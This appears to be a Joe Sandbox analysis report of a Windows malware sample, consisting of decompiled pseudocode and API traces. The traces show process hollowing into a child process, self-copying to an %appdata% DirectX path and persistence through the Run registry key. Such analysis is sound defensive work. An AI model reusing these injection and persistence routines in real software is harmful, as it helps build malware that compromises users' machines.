    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3296 Parent PID: 3284

    Executed Functions

    Function 002DE080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 002DE0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 002DE0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 002DE1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002DE1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002DE235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 002DE271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 002DE297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 002DE306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002DE32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 002DE34E
    • ResumeThread.KERNELBASE(00000000), ref: 002DE35A
    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd
    Function 002DE380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 002DE493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 002DE4B6
      • Part of subcall function 002DE080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 002DE0C6
      • Part of subcall function 002DE080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 002DE0DC
      • Part of subcall function 002DE080: CreateProcessA.KERNEL32(?,00000000), ref: 002DE1C2
      • Part of subcall function 002DE080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002DE1F0
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd
    Function 002DE510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 002DE54C
      • Part of subcall function 002DE380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 002DE493
      • Part of subcall function 002DE380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 002DE4B6
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 002DDFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3312 Parent PID: 3296

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
